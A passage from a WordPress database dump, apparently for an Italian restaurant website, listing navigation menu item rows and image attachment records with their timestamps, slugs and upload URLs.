18:36:17','2021-01-23 17:36:17','',0,'https://www.ristorantesolymar.it/2021/01/23/4158/',10,'nav_menu_item','',0),(4159,1,'2021-01-23 18:36:17','2021-01-23 17:36:17',' ','','','publish','closed','closed','','4159','','','2021-01-23 18:36:17','2021-01-23 17:36:17','',3039,'https://www.ristorantesolymar.it/2021/01/23/4159/',46,'nav_menu_item','',0),(4160,1,'2021-01-23 18:36:18','2021-01-23 17:36:18',' ','','','publish','closed','closed','','4160','','','2021-01-23 18:36:18','2021-01-23 17:36:18','',3039,'https://www.ristorantesolymar.it/2021/01/23/4160/',45,'nav_menu_item','',0),(4161,1,'2021-01-23 18:36:18','2021-01-23 17:36:18',' ','','','publish','closed','closed','','4161','','','2021-01-23 18:36:18','2021-01-23 17:36:18','',3039,'https://www.ristorantesolymar.it/2021/01/23/4161/',90,'nav_menu_item','',0),(4162,1,'2021-01-23 18:36:18','2021-01-23 17:36:18',' ','','','publish','closed','closed','','4162','','','2021-01-23 18:36:18','2021-01-23 17:36:18','',3039,'https://www.ristorantesolymar.it/2021/01/23/4162/',89,'nav_menu_item','',0),(4163,1,'2021-01-23 18:36:18','2021-01-23 17:36:18',' ','','','publish','closed','closed','','4163','','','2021-01-23 18:36:18','2021-01-23 17:36:18','',3039,'https://www.ristorantesolymar.it/2021/01/23/4163/',56,'nav_menu_item','',0),(4164,1,'2021-01-23 18:36:18','2021-01-23 17:36:18',' ','','','publish','closed','closed','','4164','','','2021-01-23 18:36:18','2021-01-23 17:36:18','',3039,'https://www.ristorantesolymar.it/2021/01/23/4164/',100,'nav_menu_item','',0),(4165,1,'2021-01-23 18:36:18','2021-01-23 17:36:18',' ','','','publish','closed','closed','','4165','','','2021-01-23 18:36:18','2021-01-23 17:36:18','',3039,'https://www.ristorantesolymar.it/2021/01/23/4165/',83,'nav_menu_item','',0),(4166,1,'2021-01-23 18:36:18','2021-01-23 17:36:18',' ','','','publish','closed','closed','','4166','','','2021-01-23 18:36:18','2021-01-23 17:36:18','',3039,'https://www.ristorantesolymar.it/2021/01/23/4166/',39,'nav_menu_item','',0),(4167,1,'2021-01-23 18:36:18','2021-01-23 17:36:18',' ','','','publish','closed','closed','','4167','','','2021-01-23 18:36:18','2021-01-23 17:36:18','',0,'https://www.ristorantesolymar.it/2021/01/23/4167/',12,'nav_menu_item','',0),(4168,1,'2021-01-23 18:36:18','2021-01-23 17:36:18',' ','','','publish','closed','closed','','4168','','','2021-01-23 18:36:18','2021-01-23 17:36:18','',0,'https://www.ristorantesolymar.it/2021/01/23/4168/',18,'nav_menu_item','',0),(4169,1,'2021-01-23 18:36:18','2021-01-23 17:36:18',' ','','','publish','closed','closed','','4169','','','2021-01-23 18:36:18','2021-01-23 17:36:18','',0,'https://www.ristorantesolymar.it/2021/01/23/4169/',21,'nav_menu_item','',0),(4170,1,'2021-01-23 18:36:18','2021-01-23 17:36:18',' ','','','publish','closed','closed','','4170','','','2021-01-23 18:36:18','2021-01-23 17:36:18','',0,'https://www.ristorantesolymar.it/2021/01/23/4170/',16,'nav_menu_item','',0),(4171,1,'2021-01-23 18:36:18','2021-01-23 17:36:18',' ','','','publish','closed','closed','','4171','','','2021-01-23 18:36:18','2021-01-23 17:36:18','',0,'https://www.ristorantesolymar.it/2021/01/23/4171/',14,'nav_menu_item','',0),(4172,1,'2021-01-23 18:36:18','2021-01-23 17:36:18',' ','','','publish','closed','closed','','4172','','','2021-01-23 18:36:18','2021-01-23 17:36:18','',0,'https://www.ristorantesolymar.it/2021/01/23/4172/',17,'nav_menu_item','',0),(4173,1,'2021-01-23 18:36:18','2021-01-23 17:36:18',' ','','','publish','closed','closed','','4173','','','2021-01-23 18:36:18','2021-01-23 17:36:18','',0,'https://www.ristorantesolymar.it/2021/01/23/4173/',20,'nav_menu_item','',0),(4174,1,'2021-01-23 18:36:18','2021-01-23 17:36:18',' ','','','publish','closed','closed','','4174','','','2021-01-23 18:36:18','2021-01-23 17:36:18','',0,'https://www.ristorantesolymar.it/2021/01/23/4174/',19,'nav_menu_item','',0),(4175,1,'2021-01-23 18:36:18','2021-01-23 17:36:18',' ','','','publish','closed','closed','','4175','','','2021-01-23 18:36:18','2021-01-23 17:36:18','',0,'https://www.ristorantesolymar.it/2021/01/23/4175/',15,'nav_menu_item','',0),(4176,1,'2021-01-23 18:36:18','2021-01-23 17:36:18',' ','','','publish','closed','closed','','4176','','','2021-01-23 18:36:18','2021-01-23 17:36:18','',3039,'https://www.ristorantesolymar.it/2021/01/23/4176/',93,'nav_menu_item','',0),(4177,1,'2021-01-23 18:36:18','2021-01-23 17:36:18',' ','','','publish','closed','closed','','4177','','','2021-01-23 18:36:18','2021-01-23 17:36:18','',3039,'https://www.ristorantesolymar.it/2021/01/23/4177/',49,'nav_menu_item','',0),(4178,1,'2021-01-23 18:36:18','2021-01-23 17:36:18',' ','','','publish','closed','closed','','4178','','','2021-01-23 18:36:18','2021-01-23 17:36:18','',3039,'https://www.ristorantesolymar.it/2021/01/23/4178/',57,'nav_menu_item','',0),(4179,1,'2021-01-23 18:36:18','2021-01-23 17:36:18',' ','','','publish','closed','closed','','4179','','','2021-01-23 18:36:18','2021-01-23 17:36:18','',3039,'https://www.ristorantesolymar.it/2021/01/23/4179/',101,'nav_menu_item','',0),(4180,1,'2021-01-23 18:36:18','2021-01-23 17:36:18',' ','','','publish','closed','closed','','4180','','','2021-01-23 18:36:18','2021-01-23 17:36:18','',3039,'https://www.ristorantesolymar.it/2021/01/23/4180/',76,'nav_menu_item','',0),(4181,1,'2021-01-23 18:36:18','2021-01-23 17:36:18',' ','','','publish','closed','closed','','4181','','','2021-01-23 18:36:18','2021-01-23 17:36:18','',3039,'https://www.ristorantesolymar.it/2021/01/23/4181/',32,'nav_menu_item','',0),(4182,1,'2021-01-23 18:36:18','2021-01-23 17:36:18',' ','','','publish','closed','closed','','4182','','','2021-01-23 18:36:18','2021-01-23 17:36:18','',0,'https://www.ristorantesolymar.it/2021/01/23/4182/',14,'nav_menu_item','',0),(4183,1,'2021-01-23 18:36:18','2021-01-23 17:36:18','','Standard','','publish','closed','closed','','standard-4','','','2021-01-23 18:36:18','2021-01-23 17:36:18','',0,'https://www.ristorantesolymar.it/2021/01/23/standard-4/',18,'nav_menu_item','',0),(4184,1,'2021-01-23 18:36:18','2021-01-23 17:36:18','','Gallery','','publish','closed','closed','','gallery-4','','','2021-01-23 18:36:18','2021-01-23 17:36:18','',0,'https://www.ristorantesolymar.it/2021/01/23/gallery-4/',19,'nav_menu_item','',0),(4185,1,'2021-01-23 18:36:18','2021-01-23 17:36:18','','Link','','publish','closed','closed','','link-4','','','2021-01-23 18:36:18','2021-01-23 17:36:18','',0,'https://www.ristorantesolymar.it/2021/01/23/link-4/',20,'nav_menu_item','',0),(4186,1,'2021-01-23 18:36:18','2021-01-23 17:36:18','','Quote','','publish','closed','closed','','quote-4','','','2021-01-23 18:36:18','2021-01-23 17:36:18','',0,'https://www.ristorantesolymar.it/2021/01/23/quote-4/',21,'nav_menu_item','',0),(4187,1,'2021-01-23 18:36:18','2021-01-23 17:36:18','','Video','','publish','closed','closed','','video-4','','','2021-01-23 18:36:18','2021-01-23 17:36:18','',0,'https://www.ristorantesolymar.it/2021/01/23/video-4/',22,'nav_menu_item','',0),(4188,1,'2021-01-23 18:36:18','2021-01-23 17:36:18','','Audio','','publish','closed','closed','','audio-4','','','2021-01-23 18:36:18','2021-01-23 17:36:18','',0,'https://www.ristorantesolymar.it/2021/01/23/audio-4/',23,'nav_menu_item','',0),(4189,1,'2021-01-23 18:36:18','2021-01-23 17:36:18','','Small Slider','','publish','closed','closed','','small-slider-7','','','2021-01-23 18:36:18','2021-01-23 17:36:18','',0,'https://www.ristorantesolymar.it/2021/01/23/small-slider-7/',66,'nav_menu_item','',0),(4190,1,'2021-01-23 18:36:18','2021-01-23 17:36:18',' ','','','publish','closed','closed','','4190','','','2021-01-23 18:36:18','2021-01-23 17:36:18','',0,'https://www.ristorantesolymar.it/2021/01/23/4190/',4,'nav_menu_item','',0),(4191,1,'2021-01-23 18:36:18','2021-01-23 17:36:18','','Big Images','','publish','closed','closed','','big-images-8','','','2021-01-23 18:36:18','2021-01-23 17:36:18','',0,'https://www.ristorantesolymar.it/2021/01/23/big-images-8/',40,'nav_menu_item','',0),(4192,1,'2021-01-23 18:36:19','2021-01-23 17:36:19','','Small Images','','publish','closed','closed','','small-images-8','','','2021-01-23 18:36:19','2021-01-23 17:36:19','',0,'https://www.ristorantesolymar.it/2021/01/23/small-images-8/',41,'nav_menu_item','',0),(4193,1,'2021-01-23 18:36:19','2021-01-23 17:36:19','','Big Slider','','publish','closed','closed','','big-slider-8','','','2021-01-23 18:36:19','2021-01-23 17:36:19','',0,'https://www.ristorantesolymar.it/2021/01/23/big-slider-8/',42,'nav_menu_item','',0),(4194,1,'2021-01-23 18:36:19','2021-01-23 17:36:19','','Small Slider','','publish','closed','closed','','small-slider-8','','','2021-01-23 18:36:19','2021-01-23 17:36:19','',0,'https://www.ristorantesolymar.it/2021/01/23/small-slider-8/',43,'nav_menu_item','',0),(4195,1,'2021-01-23 18:36:19','2021-01-23 17:36:19','','Big Gallery','','publish','closed','closed','','big-gallery-8','','','2021-01-23 18:36:19','2021-01-23 17:36:19','',0,'https://www.ristorantesolymar.it/2021/01/23/big-gallery-8/',44,'nav_menu_item','',0),(4196,1,'2021-01-23 18:36:19','2021-01-23 17:36:19',' ','','','publish','closed','closed','','4196','','','2021-01-23 18:36:19','2021-01-23 17:36:19','',3039,'https://www.ristorantesolymar.it/2021/01/23/4196/',50,'nav_menu_item','',0),(4197,1,'2021-01-23 18:36:19','2021-01-23 17:36:19',' ','','','publish','closed','closed','','4197','','','2021-01-23 18:36:19','2021-01-23 17:36:19','',3039,'https://www.ristorantesolymar.it/2021/01/23/4197/',94,'nav_menu_item','',0),(4198,1,'2021-01-23 18:36:19','2021-01-23 17:36:19','','Single Types','','publish','closed','closed','','single-types-12','','','2021-01-23 18:36:19','2021-01-23 17:36:19','',0,'https://www.ristorantesolymar.it/2021/01/23/single-types-12/',24,'nav_menu_item','',0),(4199,1,'2021-01-23 18:36:19','2021-01-23 17:36:19',' ','','','publish','closed','closed','','4199','','','2021-01-23 18:36:19','2021-01-23 17:36:19','',0,'https://www.ristorantesolymar.it/2021/01/23/4199/',16,'nav_menu_item','',0),(4200,1,'2021-01-23 18:36:19','2021-01-23 17:36:19',' ','','','publish','closed','closed','','4200','','','2021-01-23 18:36:19','2021-01-23 17:36:19','',0,'https://www.ristorantesolymar.it/2021/01/23/4200/',15,'nav_menu_item','',0),(4201,1,'2021-01-23 18:36:19','2021-01-23 17:36:19',' ','','','publish','closed','closed','','4201','','','2021-01-23 18:36:19','2021-01-23 17:36:19','',0,'https://www.ristorantesolymar.it/2021/01/23/4201/',25,'nav_menu_item','',0),(4202,1,'2021-01-23 18:36:19','2021-01-23 17:36:19',' ','','','publish','closed','closed','','4202','','','2021-01-23 18:36:19','2021-01-23 17:36:19','',0,'https://www.ristorantesolymar.it/2021/01/23/4202/',24,'nav_menu_item','',0),(4203,1,'2021-01-23 18:36:19','2021-01-23 17:36:19',' ','','','publish','closed','closed','','4203','','','2021-01-23 18:36:19','2021-01-23 17:36:19','',3061,'https://www.ristorantesolymar.it/2021/01/23/4203/',48,'nav_menu_item','',0),(4204,1,'2021-01-23 18:36:19','2021-01-23 17:36:19',' ','','','publish','closed','closed','','4204','','','2021-01-23 18:36:19','2021-01-23 17:36:19','',3061,'https://www.ristorantesolymar.it/2021/01/23/4204/',25,'nav_menu_item','',0),(4205,1,'2021-01-23 18:36:19','2021-01-23 17:36:19',' ','','','publish','closed','closed','','4205','','','2021-01-23 18:36:19','2021-01-23 17:36:19','',3061,'https://www.ristorantesolymar.it/2021/01/23/4205/',23,'nav_menu_item','',0),(4206,1,'2021-01-23 18:36:19','2021-01-23 17:36:19',' ','','','publish','closed','closed','','4206','','','2021-01-23 18:36:19','2021-01-23 17:36:19','',3061,'https://www.ristorantesolymar.it/2021/01/23/4206/',51,'nav_menu_item','',0),(4207,1,'2021-01-23 18:36:19','2021-01-23 17:36:19',' ','','','publish','closed','closed','','4207','','','2021-01-23 18:36:19','2021-01-23 17:36:19','',3061,'https://www.ristorantesolymar.it/2021/01/23/4207/',50,'nav_menu_item','',0),(4208,1,'2021-01-23 18:36:19','2021-01-23 17:36:19',' ','','','publish','closed','closed','','4208','','','2021-01-23 18:36:19','2021-01-23 17:36:19','',3061,'https://www.ristorantesolymar.it/2021/01/23/4208/',53,'nav_menu_item','',0),(4209,1,'2021-01-23 18:36:19','2021-01-23 17:36:19',' ','','','publish','closed','closed','','4209','','','2021-01-23 18:36:19','2021-01-23 17:36:19','',3061,'https://www.ristorantesolymar.it/2021/01/23/4209/',52,'nav_menu_item','',0),(4210,1,'2021-01-23 18:36:19','2021-01-23 17:36:19',' ','','','publish','closed','closed','','4210','','','2021-01-23 18:36:19','2021-01-23 17:36:19','',3061,'https://www.ristorantesolymar.it/2021/01/23/4210/',29,'nav_menu_item','',0),(4211,1,'2021-01-23 18:36:19','2021-01-23 17:36:19',' ','','','publish','closed','closed','','4211','','','2021-01-23 18:36:19','2021-01-23 17:36:19','',3061,'https://www.ristorantesolymar.it/2021/01/23/4211/',28,'nav_menu_item','',0),(4212,1,'2021-01-23 18:36:19','2021-01-23 17:36:19',' ','','','publish','closed','closed','','4212','','','2021-01-23 18:36:19','2021-01-23 17:36:19','',3061,'https://www.ristorantesolymar.it/2021/01/23/4212/',27,'nav_menu_item','',0),(4213,1,'2021-01-23 18:36:19','2021-01-23 17:36:19',' ','','','publish','closed','closed','','4213','','','2021-01-23 18:36:19','2021-01-23 17:36:19','',3061,'https://www.ristorantesolymar.it/2021/01/23/4213/',30,'nav_menu_item','',0),(4214,1,'2021-01-23 18:36:19','2021-01-23 17:36:19',' ','','','publish','closed','closed','','4214','','','2021-01-23 18:36:19','2021-01-23 17:36:19','',3061,'https://www.ristorantesolymar.it/2021/01/23/4214/',37,'nav_menu_item','',0),(4215,1,'2021-01-23 18:36:19','2021-01-23 17:36:19',' ','','','publish','closed','closed','','4215','','','2021-01-23 18:36:19','2021-01-23 17:36:19','',3061,'https://www.ristorantesolymar.it/2021/01/23/4215/',60,'nav_menu_item','',0),(4216,1,'2021-01-23 18:36:19','2021-01-23 17:36:19',' ','','','publish','closed','closed','','4216','','','2021-01-23 18:36:19','2021-01-23 17:36:19','',3039,'https://www.ristorantesolymar.it/2021/01/23/4216/',77,'nav_menu_item','',0),(4217,1,'2021-01-23 18:36:19','2021-01-23 17:36:19',' ','','','publish','closed','closed','','4217','','','2021-01-23 18:36:19','2021-01-23 17:36:19','',3039,'https://www.ristorantesolymar.it/2021/01/23/4217/',33,'nav_menu_item','',0),(4218,1,'2021-01-23 18:36:19','2021-01-23 17:36:19',' ','','','publish','closed','closed','','4218','','','2021-01-23 18:36:19','2021-01-23 17:36:19','',3039,'https://www.ristorantesolymar.it/2021/01/23/4218/',40,'nav_menu_item','',0),(4219,1,'2021-01-23 18:36:19','2021-01-23 17:36:19',' ','','','publish','closed','closed','','4219','','','2021-01-23 18:36:19','2021-01-23 17:36:19','',3039,'https://www.ristorantesolymar.it/2021/01/23/4219/',41,'nav_menu_item','',0),(4220,1,'2021-01-23 18:36:19','2021-01-23 17:36:19',' ','','','publish','closed','closed','','4220','','','2021-01-23 18:36:19','2021-01-23 17:36:19','',3039,'https://www.ristorantesolymar.it/2021/01/23/4220/',84,'nav_menu_item','',0),(4221,1,'2021-01-23 18:36:19','2021-01-23 17:36:19',' ','','','publish','closed','closed','','4221','','','2021-01-23 18:36:19','2021-01-23 17:36:19','',3039,'https://www.ristorantesolymar.it/2021/01/23/4221/',85,'nav_menu_item','',0),(4222,1,'2021-01-23 18:36:19','2021-01-23 17:36:19',' ','','','publish','closed','closed','','4222','','','2021-01-23 18:36:19','2021-01-23 17:36:19','',3061,'https://www.ristorantesolymar.it/2021/01/23/4222/',47,'nav_menu_item','',0),(4223,1,'2021-01-23 18:36:19','2021-01-23 17:36:19',' ','','','publish','closed','closed','','4223','','','2021-01-23 18:36:19','2021-01-23 17:36:19','',3061,'https://www.ristorantesolymar.it/2021/01/23/4223/',46,'nav_menu_item','',0),(4224,1,'2021-01-23 18:36:20','2021-01-23 17:36:20',' ','','','publish','closed','closed','','4224','','','2021-01-23 18:36:20','2021-01-23 17:36:20','',3061,'https://www.ristorantesolymar.it/2021/01/23/4224/',22,'nav_menu_item','',0),(4225,1,'2021-01-23 18:36:20','2021-01-23 17:36:20',' ','','','publish','closed','closed','','4225','','','2021-01-23 18:36:20','2021-01-23 17:36:20','',3061,'https://www.ristorantesolymar.it/2021/01/23/4225/',21,'nav_menu_item','',0),(4226,1,'2021-01-23 18:36:20','2021-01-23 17:36:20',' ','','','publish','closed','closed','','4226','','','2021-01-23 18:36:20','2021-01-23 17:36:20','',3061,'https://www.ristorantesolymar.it/2021/01/23/4226/',24,'nav_menu_item','',0),(4227,1,'2021-01-23 18:36:20','2021-01-23 17:36:20',' ','','','publish','closed','closed','','4227','','','2021-01-23 18:36:20','2021-01-23 17:36:20','',3061,'https://www.ristorantesolymar.it/2021/01/23/4227/',23,'nav_menu_item','',0),(4228,1,'2021-01-23 18:36:20','2021-01-23 17:36:20','','Three Columns','','publish','closed','closed','','three-columns-8','','','2021-01-23 18:36:20','2021-01-23 17:36:20','',3061,'https://www.ristorantesolymar.it/2021/01/23/three-columns-8/',32,'nav_menu_item','',0),(4229,1,'2021-01-23 18:36:20','2021-01-23 17:36:20','','Four Columns Wide','','publish','closed','closed','','four-columns-wide-8','','','2021-01-23 18:36:20','2021-01-23 17:36:20','',3061,'https://www.ristorantesolymar.it/2021/01/23/four-columns-wide-8/',34,'nav_menu_item','',0),(4230,1,'2021-01-23 18:36:20','2021-01-23 17:36:20','','Four Columns','','publish','closed','closed','','four-columns-8','','','2021-01-23 18:36:20','2021-01-23 17:36:20','',3061,'https://www.ristorantesolymar.it/2021/01/23/four-columns-8/',33,'nav_menu_item','',0),(4231,1,'2021-01-23 18:36:20','2021-01-23 17:36:20',' ','','','publish','closed','closed','','4231','','','2021-01-23 18:36:20','2021-01-23 17:36:20','',3061,'https://www.ristorantesolymar.it/2021/01/23/4231/',61,'nav_menu_item','',0),(4232,1,'2021-01-23 18:36:20','2021-01-23 17:36:20',' ','','','publish','closed','closed','','4232','','','2021-01-23 18:36:20','2021-01-23 17:36:20','',3061,'https://www.ristorantesolymar.it/2021/01/23/4232/',38,'nav_menu_item','',0),(4233,1,'2021-01-23 18:36:20','2021-01-23 17:36:20',' ','','','publish','closed','closed','','4233','','','2021-01-23 18:36:20','2021-01-23 17:36:20','',0,'https://www.ristorantesolymar.it/2021/01/23/4233/',10,'nav_menu_item','',0),(4234,1,'2021-01-23 18:36:20','2021-01-23 17:36:20',' ','','','publish','closed','closed','','4234','','','2021-01-23 18:36:20','2021-01-23 17:36:20','',0,'https://www.ristorantesolymar.it/2021/01/23/4234/',10,'nav_menu_item','',0),(4235,1,'2021-01-23 18:36:20','2021-01-23 17:36:20','','FIve Columns Wide','','publish','closed','closed','','five-columns-wide-7','','','2021-01-23 18:36:20','2021-01-23 17:36:20','',3061,'https://www.ristorantesolymar.it/2021/01/23/five-columns-wide-7/',58,'nav_menu_item','',0),(4236,1,'2021-01-23 18:36:20','2021-01-23 17:36:20','','FIve Columns Wide','','publish','closed','closed','','five-columns-wide-8','','','2021-01-23 18:36:20','2021-01-23 17:36:20','',3061,'https://www.ristorantesolymar.it/2021/01/23/five-columns-wide-8/',35,'nav_menu_item','',0),(4237,1,'2021-01-23 18:36:20','2021-01-23 17:36:20','','Six Columns Wide','','publish','closed','closed','','six-columns-wide-7','','','2021-01-23 18:36:20','2021-01-23 17:36:20','',3061,'https://www.ristorantesolymar.it/2021/01/23/six-columns-wide-7/',59,'nav_menu_item','',0),(4238,1,'2021-01-23 18:36:20','2021-01-23 17:36:20','','Six Columns Wide','','publish','closed','closed','','six-columns-wide-8','','','2021-01-23 18:36:20','2021-01-23 17:36:20','',3061,'https://www.ristorantesolymar.it/2021/01/23/six-columns-wide-8/',36,'nav_menu_item','',0),(2946,1,'2018-09-17 11:16:36','2018-09-17 11:16:36','','landing-img-1','','inherit','open','closed','','landing-img-1-2','','','2018-09-17 11:16:36','2018-09-17 11:16:36','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-img-1-1.jpg',0,'attachment','image/jpeg',0),(2735,1,'2018-09-04 13:24:57','2018-09-04 13:24:57','','landing-vector-img-5','','inherit','open','closed','','landing-vector-img-5','','','2018-09-04 13:24:57','2018-09-04 13:24:57','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-vector-img-5.png',0,'attachment','image/png',0),(2784,1,'2018-09-05 09:37:47','2018-09-05 09:37:47','','landing-print-img-8','','inherit','open','closed','','landing-print-img-8','','','2018-09-05 09:37:47','2018-09-05 09:37:47','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-print-img-8.jpg',0,'attachment','image/jpeg',0),(2949,1,'2018-09-17 11:22:25','2018-09-17 11:22:25','','landing-img-5','','inherit','open','closed','','landing-img-5-2','','','2018-09-17 11:22:25','2018-09-17 11:22:25','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-img-5-1.jpg',0,'attachment','image/jpeg',0),(2770,1,'2018-09-05 08:18:38','2018-09-05 08:18:38','','landing-vector-img-11','','inherit','open','closed','','landing-vector-img-11','','','2018-09-05 08:18:38','2018-09-05 08:18:38','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-vector-img-11.png',0,'attachment','image/png',0),(2948,1,'2018-09-17 11:20:16','2018-09-17 11:20:16','','landing-img-4','','inherit','open','closed','','landing-img-4-2','','','2018-09-17 11:20:16','2018-09-17 11:20:16','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-img-4-1.jpg',0,'attachment','image/jpeg',0),(2785,1,'2018-09-05 09:37:49','2018-09-05 09:37:49','','landing-vector-img-14','','inherit','open','closed','','landing-vector-img-14','','','2018-09-05 09:37:49','2018-09-05 09:37:49','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-vector-img-14.png',0,'attachment','image/png',0),(2748,1,'2018-09-04 14:34:18','2018-09-04 14:34:18','','landing-backround-img-1','','inherit','open','closed','','landing-backround-img-1','','','2018-09-04 14:34:18','2018-09-04 14:34:18','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-backround-img-1.jpg',0,'attachment','image/jpeg',0),(2973,1,'2018-09-19 08:48:42','2018-09-19 08:48:42','','landing-print-img-1','','inherit','open','closed','','landing-print-img-1-2','','','2018-09-19 08:48:42','2018-09-19 08:48:42','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-print-img-1-1.jpg',0,'attachment','image/jpeg',0),(2771,1,'2018-09-05 08:44:04','2018-09-05 08:44:04','','landing-img-10','','inherit','open','closed','','landing-img-10','','','2018-09-05 08:44:04','2018-09-05 08:44:04','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-img-10.jpg',0,'attachment','image/jpeg',0),(2974,1,'2018-09-19 08:48:45','2018-09-19 08:48:45','','landing-print-img-2','','inherit','open','closed','','landing-print-img-2-2','','','2018-09-19 08:48:45','2018-09-19 08:48:45','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-print-img-2-1.jpg',0,'attachment','image/jpeg',0),(2975,1,'2018-09-19 08:48:48','2018-09-19 08:48:48','','landing-print-img-3','','inherit','open','closed','','landing-print-img-3-2','','','2018-09-19 08:48:48','2018-09-19 08:48:48','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-print-img-3-1.jpg',0,'attachment','image/jpeg',0),(2976,1,'2018-09-19 08:48:50','2018-09-19 08:48:50','','landing-print-img-6','','inherit','open','closed','','landing-print-img-6-2','','','2018-09-19 08:48:50','2018-09-19 08:48:50','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-print-img-6-1.jpg',0,'attachment','image/jpeg',0),(2978,1,'2018-09-19 09:11:00','2018-09-19 09:11:00','','landing-img-2','','inherit','open','closed','','landing-img-2-2','','','2018-09-19 09:11:00','2018-09-19 09:11:00','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-img-2-1.jpg',0,'attachment','image/jpeg',0),(2985,1,'2018-09-19 13:21:16','2018-09-19 13:21:16','','landing-box-img-1','','inherit','open','closed','','landing-box-img-1','','','2018-09-19 13:21:16','2018-09-19 13:21:16','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-box-img-1.jpg',0,'attachment','image/jpeg',0),(2986,1,'2018-09-19 13:21:18','2018-09-19 13:21:18','','landing-box-img-2','','inherit','open','closed','','landing-box-img-2','','','2018-09-19 13:21:18','2018-09-19 13:21:18','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-box-img-2.jpg',0,'attachment','image/jpeg',0),(4348,1,'2021-01-23 18:56:17','2021-01-23 17:56:17','','Home','','publish','closed','closed','','home-17','','','2021-01-23 18:56:17','2021-01-23 17:56:17','',0,'https://www.ristorantesolymar.it/2021/01/23/home-17/',1,'nav_menu_item','',0),(4349,1,'2021-01-23 18:56:17','2021-01-23 17:56:17','','Pages','','publish','closed','closed','','pages-17','','','2021-01-23 18:56:17','2021-01-23 17:56:17','',0,'https://www.ristorantesolymar.it/2021/01/23/pages-17/',11,'nav_menu_item','',0),(4350,1,'2021-01-23 18:56:17','2021-01-23 17:56:17','','Blog','','publish','closed','closed','','blog-17','','','2021-01-23 18:56:17','2021-01-23 17:56:17','',0,'https://www.ristorantesolymar.it/2021/01/23/blog-17/',22,'nav_menu_item','',0),(4351,1,'2021-01-23 18:56:17','2021-01-23 17:56:17','','Shop','','publish','closed','closed','','shop-17','','','2021-01-23 18:56:17','2021-01-23 17:56:17','',0,'https://www.ristorantesolymar.it/2021/01/23/shop-17/',33,'nav_menu_item','',0),(4352,1,'2021-01-23 18:56:17','2021-01-23 17:56:17','','Portfolio','','publish','closed','closed','','portfolio-17','','','2021-01-23 18:56:17','2021-01-23 17:56:17','',0,'https://www.ristorantesolymar.it/2021/01/23/portfolio-17/',45,'nav_menu_item','',0),(4353,1,'2021-01-23 18:56:17','2021-01-23 17:56:17','','Elements','','publish','closed','closed','','elements-9','','','2021-01-23 18:56:17','2021-01-23 17:56:17','',0,'https://www.ristorantesolymar.it/2021/01/23/elements-9/',68,'nav_menu_item','',0),(4354,1,'2021-01-23 18:56:17','2021-01-23 17:56:17','','Home','','publish','closed','closed','','home-18','','','2021-01-23 18:56:17','2021-01-23 17:56:17','',0,'https://www.ristorantesolymar.it/2021/01/23/home-18/',1,'nav_menu_item','',0),(4355,1,'2021-01-23 18:56:17','2021-01-23 17:56:17','','Pages','','publish','closed','closed','','pages-18','','','2021-01-23 18:56:17','2021-01-23 17:56:17','',0,'https://www.ristorantesolymar.it/2021/01/23/pages-18/',11,'nav_menu_item','',0),(4356,1,'2021-01-23 18:56:17','2021-01-23 17:56:17','','Portfolio','','publish','closed','closed','','portfolio-18','','','2021-01-23 18:56:17','2021-01-23 17:56:17','',0,'https://www.ristorantesolymar.it/2021/01/23/portfolio-18/',22,'nav_menu_item','',0),(4357,1,'2021-01-23 18:56:17','2021-01-23 17:56:17','','Shop','','publish','closed','closed','','shop-18','','','2021-01-23 18:56:17','2021-01-23 17:56:17','',0,'https://www.ristorantesolymar.it/2021/01/23/shop-18/',1,'nav_menu_item','',0),(4358,1,'2021-01-23 18:56:17','2021-01-23 17:56:17','','Blog','','publish','closed','closed','','blog-18','','','2021-01-23 18:56:17','2021-01-23 17:56:17','',0,'https://www.ristorantesolymar.it/2021/01/23/blog-18/',13,'nav_menu_item','',0),(4359,1,'2021-01-23 18:56:17','2021-01-23 17:56:17','','Elements','','publish','closed','closed','','elements-10','','','2021-01-23 18:56:17','2021-01-23 17:56:17','',0,'https://www.ristorantesolymar.it/2021/01/23/elements-10/',24,'nav_menu_item','',0),(4360,1,'2021-01-23 18:56:17','2021-01-23 17:56:17','','Home','','publish','closed','closed','','home-19','','','2021-01-23 18:56:17','2021-01-23 17:56:17','',0,'https://www.ristorantesolymar.it/2021/01/23/home-19/',1,'nav_menu_item','',0),(4361,1,'2021-01-23 18:56:17','2021-01-23 17:56:17','','Pages','','publish','closed','closed','','pages-19','','','2021-01-23 18:56:17','2021-01-23 17:56:17','',0,'https://www.ristorantesolymar.it/2021/01/23/pages-19/',6,'nav_menu_item','',0),(4362,1,'2021-01-23 18:56:18','2021-01-23 17:56:18','','Shop','','publish','closed','closed','','shop-19','','','2021-01-23 18:56:18','2021-01-23 17:56:18','',0,'https://www.ristorantesolymar.it/2021/01/23/shop-19/',19,'nav_menu_item','',0),(4363,1,'2021-01-23 18:56:18','2021-01-23 17:56:18','','Portfolio','','publish','closed','closed','','portfolio-19','','','2021-01-23 18:56:18','2021-01-23 17:56:18','',0,'https://www.ristorantesolymar.it/2021/01/23/portfolio-19/',11,'nav_menu_item','',0),(4364,1,'2021-01-23 18:56:18','2021-01-23 17:56:18','','Blog','','publish','closed','closed','','blog-19','','','2021-01-23 18:56:18','2021-01-23 17:56:18','',0,'https://www.ristorantesolymar.it/2021/01/23/blog-19/',15,'nav_menu_item','',0),(4365,1,'2021-01-23 18:56:18','2021-01-23 17:56:18','','Home','','publish','closed','closed','','home-20','','','2021-01-23 18:56:18','2021-01-23 17:56:18','',0,'https://www.ristorantesolymar.it/2021/01/23/home-20/',1,'nav_menu_item','',0),(4366,1,'2021-01-23 18:56:18','2021-01-23 17:56:18','','Pages','','publish','closed','closed','','pages-20','','','2021-01-23 